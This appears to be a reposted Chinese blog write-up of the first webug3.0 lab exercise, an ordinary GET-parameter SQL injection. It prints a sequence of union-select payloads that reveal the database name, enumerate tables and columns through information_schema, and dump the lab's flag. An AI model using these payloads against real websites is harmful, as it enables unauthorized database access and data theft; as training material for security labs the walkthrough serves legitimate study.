我是靠谱客的博主 缓慢月光,最近开发中收集的这篇文章主要介绍webug3.0第一题 普通的get注入普通的get注入,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

普通的get注入

首先这是这道题

我们点击去

发现有一个可以提交数据的地方,对于常见的漏洞来说,可以提交数据的地方就是可以控制输入的地方,就有可能存在漏洞,而且我们从网页上看到他显示的有四条数据  可以构造语句如下:1 '  union select 1,2,3,database()#我们直接试一下sql注入语句

则·当前数据库为pentesterlab

我们再爆一下表1 '  union select 1,2,3,table_name from information_schema.tables where table_schema='pentesterlab'#

可以看到有一个flag表  我们爆一下列

1 '  union select 1,2,3,column_name from information_schema.columns where table_name='flag'#

爆字段1 '  union select 1,2,3,flag from flag#

flag:204f704fbbcf6acf398ffee11989b377

最后

以上就是缓慢月光为你收集整理的webug3.0第一题 普通的get注入普通的get注入的全部内容,希望文章能够帮你解决webug3.0第一题 普通的get注入普通的get注入所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(51)

评论列表共有 0 条评论

立即
投稿
返回
顶部